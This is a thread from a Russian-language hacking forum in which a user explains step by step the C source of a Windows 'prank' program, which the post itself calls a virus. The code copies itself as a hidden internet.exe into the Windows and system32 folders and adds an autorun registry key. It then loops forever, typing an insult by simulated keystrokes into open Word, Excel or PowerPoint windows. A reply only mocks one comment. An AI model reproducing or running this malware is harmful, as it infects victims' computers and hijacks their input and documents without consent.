Основан 26 Июля 2013 года
freehacks.ru fhacks.me fhacks.pw fhacksnplmzxaaoo.onion
Показано с 1 по 2 из 2
  1. #1
    TopicStarter
    Заблокирован по собственному желанию
    Аватар для S3ct0r

    Статус
    Offline
    Регистрация
    30.03.2014
    Сообщений
    459
    Репутация
    202 + / -
    Другое

    Шутка с MS Word

    Распшем по шагам как устроен этот шутник.

    Подключаем библиотеки и создаем основные переменные.

    Код:
    #include <windows.h>
    #include <iostream.h>
    
    WINAPI WinMain(HINSTANCE hint, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
    {
    
    HKEY key;
    char sysdir[256],
    windir[256],
    myname[256];
    Узнаем свое имя функцией GetModuleFileName. И узнает адрес папки windows и папки system32 функциями GetWindowsDirectory и GetSystemDirectory

    Код:
    GetModuleFileName(hint,myname,256);
    GetWindowsDirectory(windir,sizeof(windir));
    GetSystemDirectory(sysdir,sizeof(sysdir));
    Добавляем к строкам содержащим пути к системным папкам имя нашего вируса, чтобы скопировать в эти папки себя.

    Код:
    strcat(windir,"\\internet.exe");
    strcat(sysdir,"\\internet.exe");
    Копируемся и ставим себе скрытые атрибуты

    Код:
    CopyFile(myname,windir,FALSE);
    CopyFile(myname,sysdir,FALSE);
    SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes(sysdir,FILE_ATTRIBUTE_HIDDEN);
    Прописываемся в реестр на авторан

    Код:
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0,KEY_WRITE, &key);
    RegSetValueEx(key,"internet.exe",0,REG_SZ,(BYTE *)sysdir,256);
    RegCloseKey(key);
    Ожидаем 2 минуты. Зачем не знаю ))

    Код:
    Sleep(60000*2); //Две минуты
    Запускаем бесконечный цикл каждые 10 секунд. В цикле ищем окна содержащие в своих заголовках Microsoft Word, Microsoft Excel,Microsoft PowerPoint. Максимизируем окно, переключаем раскладку клавиатуры на русскую и эмулируем нажатие на несколько клавиш. В результате в окне пользователя в WORD сам по себе печатается текст "Вы ламер".

    Код:
    int k=0;
    do
    {
    if (FindWindow(NULL, "Microsoft Word")!=0 || FindWindow(NULL, "Microsoft Excel")!=0 || FindWindow(NULL, "Microsoft PowerPoint")!=0)
    {
    ShowWindow(FindWindow(NULL, "Microsoft Word") , SC_MAXIMIZE);
    LoadKeyboardLayout("00000419", KLF_ACTIVATE);
    Sleep(10000);
    do
    {
    keybd_event('D', 0,0,0);
    keybd_event('D', 0,KEYEVENTF_KEYUP,0);
    keybd_event('S', 0,0,0);
    keybd_event('S', 0,KEYEVENTF_KEYUP,0);
    keybd_event(VK_SPACE, 0,0,0);
    keybd_event(VK_SPACE, 0,KEYEVENTF_KEYUP,0);
    keybd_event('K', 0,0,0);
    keybd_event('K', 0,KEYEVENTF_KEYUP,0);
    keybd_event('F', 0,0,0);
    keybd_event('F', 0,KEYEVENTF_KEYUP,0);
    keybd_event('V', 0,0,0);
    keybd_event('V', 0,KEYEVENTF_KEYUP,0);
    keybd_event('T', 0,0,0);
    keybd_event('T', 0,KEYEVENTF_KEYUP,0);
    keybd_event('H', 0,0,0);
    keybd_event('H', 0,KEYEVENTF_KEYUP,0);
    }while(1);
    }
    }while(1);
    }
    The End!
    Последний раз редактировалось S3ct0r; 29.06.2014 в 16:10.

  2. #2
    Аватар для XaskiVision

    Статус
    Offline
    Регистрация
    17.12.2013
    Сообщений
    171
    Репутация
    57 + / -
    DDoS / DoS
    Цитата Сообщение от Mr.Rb4s3 Посмотреть сообщение
    Ожидаем 2 минуты. Зачем не знаю ))
    Код:
    Sleep(60000*2); //Две минуты
    Океееей..

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  

Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.